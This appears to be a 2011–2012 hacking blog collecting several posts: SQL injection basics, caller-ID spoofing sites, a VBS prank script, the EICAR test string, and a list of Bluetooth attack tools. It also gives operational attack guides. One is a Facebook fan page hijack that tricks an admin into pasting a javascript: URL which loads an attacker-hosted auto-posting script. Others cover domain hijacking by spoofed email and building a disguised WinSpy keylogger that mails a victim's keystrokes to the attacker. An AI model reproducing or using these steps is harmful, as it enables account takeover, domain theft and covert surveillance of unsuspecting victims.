Welcome back ! Feel free to look around. If you like what you read, mention us in your post or link to this site. Hope to see you again

Thursday, 23 February 2012

What is SQL ,SQL Injection and what an attacker can do , Data Base and types of Data Base?

Follow Hackers Spot

What is SQL?

SQL (pronounced "ess-que-el") stands for Structured Query Language. SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server.

What is Database

A database can be thought of as a set of logically related files organized to facilitate access by one or more applications programs and to minimize data redundancy. This concept does not imply that all data relating to a company’s business should be contained on a single database, but simply that all records in a database should be related and that redundant data should be minimized.


Some List of Database are:




* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite.

Monday, 20 February 2012

Spoof Call-ID and list VOIP SItes

Follow Hackers Spot


Now As I said heres the second post on the main Part of VOIP.

Topics:-
1. Advantages of Using VoIP

2. Caller-ID Spoofing Attack


Advantages of Using VoIP

1. 90% Cost Saving (cheap call rates).
2. Great voice quality.
3. way Call forwarding.
4.Caller ID spoofing.
5. Unlimited calling.
6. Web calling.
7. Free phone call services.
8. Free Call Forwarding.


And NOw Gonna Give You List Of The Most and Famous Sites
To Call Free, Unlimited,Spoofing & Top Voip Companies.
..........................................................................................................................................................................
Top Voip Companies:

1. www.skype.com

2. www.callcentric.com

3. www.jajah.com/

4. www.phonepower.com

5. http://grandcentral.com/
........................................................................................................................................................................
Free Calling sites :
1. http://evaphone.com

2. www.talkster.com

3. www.tabrio.com

4. http://freecallplanet.com
..........................................................................................................................................................................
Unlimited Calling Sites :
1. www.joiphone.com

2. www.100call.com

3. www.telifu.com

4. www.visonade.com
..........................................................................................................................................................................
What Is Call-ID Spoofing Attack ..???

Caller ID spoofing is the practice of causing the telephone network to display a number
on the recipient's caller ID display which is not that of the actual originating station; the
term is commonly used to describe situations in which the motivation is considered
nefarious by the speaker. Just as e-mail spoofing can make it appear that a message came
from any e-mail address the sender chooses, caller ID spoofing can make a call appear to
have come from any phone number the caller wishes.

ADVANTAGES :-
1. Show any number on victim mobile number

2. Record Outgoing Calls

3. Listen to your calls online

4. Include recordings in email

5. Download your recordings.

Caller ID Spoofing sites :
1. www.123spoof.com

2. www.spooftel.com

3. www.spoofcard.com

4. www.spoofapp.com

5. www.stealthrecordercard.com


Note:- This article is only for Educational purpose, Hackersspot is not responisble for any circumstances...!!!

"DONT MISSUSE"

What Is VOIP and How it works(Basic)??

Follow Hackers Spot

Hello Readers , here i am back with one more intresting post for you, It will be an intresting Post for you to read and perform but missuing this trick may get you to danger...!!X

Now, I the Topics i will be covering are:

What is VOIP?
How VOIP works?
And

" Advantages of Using VoIP"
" Caller-ID Spoofing Attack"
IN next post link:- Here

........................................................................................................................................

What is VOIP?
Voice-over-Internet protocol (VoIP, ) is a protocol optimized for the transmission of
voice through the Internet or other packet-switched networks .
VoIP systems employ session control protocols to control the set-up and tear-down of
calls as well as audio codecs which encode speech allowing transmission over an IP
network as digital audio via an audio stream. Codec use is varied between different
implementations of VoIP (and often a range of codecs are used); some implementations
rely on narrowband and compressed speech, while others support high fidelity stereo
codecs.

........................................................................................................................................


How VOIP works?


VoIP converts the voice signal from your telephone into a digital signal that can travel
over the Internet. If you are calling a regular telephone number, the signal is then
converted back at the other end. Depending on the type of VoIP service, you can make a
VoIP call from a computer, a special VoIP phone, or a traditional phone. Wireless "hot
spots" in public locations such as airports, parks, and cafes allow you to connect to the
Internet, and may enable you to use VoIP service wirelessly. If your VoIP service
provider assigns you a regular telephone number, then you can receive calls from regular
telephones that don't need special equipment.

Next Post :- Here .

Monday, 6 February 2012

Follow Hackers Spot



Make an Error Message to get your friend with a heart attack ...!!! Hahhahaa Looks funny and entertaining ;)
Get the Below code to Notepad and Save it as hackersspot.vbs and then run it :

x=msgbox("your computer is infected", 4+16 , "virus detector") do x=msgbox("Visit hackersspot3.tk or www.acena20.blogspot.com for help", 1+4 ,"shutting down") loop


H0w to Make Y0ur C0mputer Speak..????

Follow Hackers Spot

How To Make your Computer Speak ???? ;) . You can make your comp speak with different Softwares but have you ever thought to make your computer speak with your own script??? Now here an tutorial on how to make your computer speak by our own script..!!!!!

1. Open Notepad and paste the following code in :

Dim Message, Speak
Message=InputBox("Enter text","Hackersspot3.tk")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message

2. Now Save the file as " Hackersspot.vbs "

And you Are done open the file a box appears as in the above image write what you want your computer to speak..!! :) Keep Visiting ;)

Saturday, 24 December 2011

Follow Hackers Spot

You all might be knowing about the porn scam going in facebook nowadays ..!! but how to prevent yourself from these attacks ??? Yes, if u dont clickon those links you can be bt if you do so or anyone who is unknown then?? But heres a way to prevent yourself from these attack. A antivirus can protect you from this , I got on this review and found the solution.



Yeh now protect yourself from porn scam in facebook by AVG Antivirus12.

Just install it and when you get o open that you find that it is detected as a scam by AVG .Image:-
Enjoy ..!! You can download it form H
ere :

Avg Antivirus link :- Download


Keep Visiting..!!

Check Effectiveness Of Your Antivirus..!!

Follow Hackers Spot

Hello Visitors Todays i have brought a Trick for you all :- "How to Check Effectiviness of your Antivirus"...!! You can check this by just typing a script , the process is shown below. Hope you all will like it.

Process :-

1. Open a new text document, Click start menu go to run and type wordpad or notepad .


2. Type there the following code and save it as virustestfile.com X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


3. Now run Antivirus scan If your antivirus detects it as a virus then your Antivirus is working properly,
and If it doesn't detect it as a virus then your antivirus is not ..!!!
Update it to work properly..!!!

Tuesday, 20 December 2011

Domain Hacking

Follow Hackers Spot


A Domain hacking is a process to transfer domain(yahoo.com) without owner permission
with help of phishing, sniffing,spoofing.
A domain hack is an unconventional domain name that combines domain levels,
especially the top-level domain (TLD), to spell out the full "name" or title of the domain,
making a kind of fun.


Domain Hacking process:
1. See who.is record of victim(xyz.com) DNS record and note down
admin email (hackersspot3@gmail.com)

2. Send spoof mail to victim admin email for password.

3. after open domain registrar(my.indialinks.com) website to access
their domain control panel (click forget password)

4. After you get a password in victim email address of victim domain.

5. Just login on domain control panel.

6. and get ECCP code and create new account on hosting company
and choose Domain transfer (all submit all details)

7. You will get all rights on this domain for lifetime.

eg Domain :- www.Google.com

Saturday, 17 December 2011

H@cK FaCeBook F@N PaGe

Follow Hackers Spot






                               How to Hack Facebook Fan Page



Today I will show you how to hack a Facebook fan page.This is one of the most intresting  those who use facebook..

Now lets start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. This will be told along thistutorial .:)


Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.


1. Download the exploit from this
here

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from
here.

3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.


4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)


5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:


www.yoursite.110mb/booster.js


6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.


javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.110mb.com/booster.js“, b.body.appendChild(a); void(0)


Tip:  You can also encode this in ASCII format for more better results.

Monday, 12 December 2011

List Of Bluetooth hacking Essential tools Now with Download Links..~!

Follow Hackers Spot

Learn HOw to HAck Cell Phones Using SUper Bluetoth :-
http://acena20.blogspot.com/2011/11/how-to-hack-cell-phones-using-bluetooth.html

...........................................////////////////////....................................................................

Bluetooth Hacking


Bluetooth hacking: Essential tools Now with Download Link..!!.:-

Bluetooth is one of the most rapidly growing connection technology. If you are someone who is
planning to gain better understanding of Bluetooth Security, you will need some essential tools.
This article lists down the Essential Bluetooth Hacking Tools.


1.) BlueScanner: BlueScanner searches out for Bluetooth-enabled devices. It will try to extract
as much information as possible for each newly discovered device.

DOWNLOAD

2.) BlueSniff: BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetoothenabled devices.

DOWNLOAD

3.) BTBrowser: Bluetooth Browser is a J2ME application that can browse and explore the
technical specification of surrounding Bluetooth-enabled devices. You can browse device
information and all supported profiles and service records of each device. BTBrowser works on
phones that supports JSR-82 - the Java Bluetooth specification.

DOWNLOAD

4.) BTCrawler: BTCrawler is a scanner for Windows Mobile based devices. It scans for other
devices in range and performs service query. It implements the BlueJacking and BlueSnarfing
attacks.

DOWNLOAD

5.) BlueBugger: BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set
of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those
vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other
private information.
DOWNLOAD / here

6.) CIHWB: Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework
for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like
BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft
Bluetooth stack.

DOWNLOAD

7.) Bluediving: Bluediving is a Bluetooth penetration testing suite. It implements attacks like
Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing,an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scannin mode.

DOWNLOAD

8.) Transient Bluetooth Environment Auditor: T-BEAR is a security-auditing platform for
Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and
various cracking tools.

DOWNLOAD

9.) Bluesnarfer: Bluesnarfer will download the phone-book of any mobile device vulnerable
to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled
mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without
alerting the owner, and gain access to restricted portions of the stored data.

DOWNLOAD

10.) BTcrack: BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to
reconstruct the Passkey and the Link key from captured Pairing exchanges.

DOWNLOAD

11.) Blooover II: Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
DOWNLOAD

12.) BlueTest: BlueTest is a Perl script designed to do data extraction from vulnerable
Bluetooth-enabled devices.

DOWNLOAD

13.) BTAudit: BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices. DOWNLOAD

Learn HOw to HAck Cell Phones Using SUper Bluetoth :- here

Friends Please Share Which you Like ,..!! Founded For by reading the Comments >>Seached Lot For This All<<< SO, Please Share ..!!

Thursday, 24 November 2011

HACK/SPY WITH WINSPY..

Follow Hackers Spot

Winspy Keylogger
WinSpy Software is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. It includes Remote Install and Real-time Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard.

How To Use Winspy

Step 1 - First of all you need to Download winspy keylogger


Step 2 - After downloading winspy keylogger run the application. On running, a dialog box will be prompted. Now, create a user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.


Step 3 - Now, another box will come, explaining you the hot keys(Ctrl + Shift +F12) to start the Winspy keylogger software.



Step 4 - Now pressing on the hot keys will take you a login box asking you to enter the username and password. Enter the username and password and click ok.

Step 5 - On entering the username and password you will be taken to winspy main screen. Now select Remote at top and click on Remote install.

Step 6 - On doing this you will be taken to the Remote install file creator. Enter the following things there:

User – Type in the victim’s name.
File Name – Here you need to enter the name of file needs to be sent. Like I have kept the name “Funny joke” which the victim will love to accept.
File icon – You really don’t need to change this.
Picture – Select the picture you want to insert to the remote file.
Email log to – In this field enter your email address which you will use to receive the
Keystrokes - As hotmail account do not accept remote logs so it’s necessary to use a Gmail account instead.


Step 7 - After you have done all the above steps, click on “Create remote file”. Now the remote file will be created, it will look something like this

Now all you have to do is just send the remote file to the victim via email attachment or by uploading it to a web-hosting site and then sending victim the download link. Once the remote file gets installed into victim’s computer, you will receive keystrokes on your Gmail ID you entered in step 6.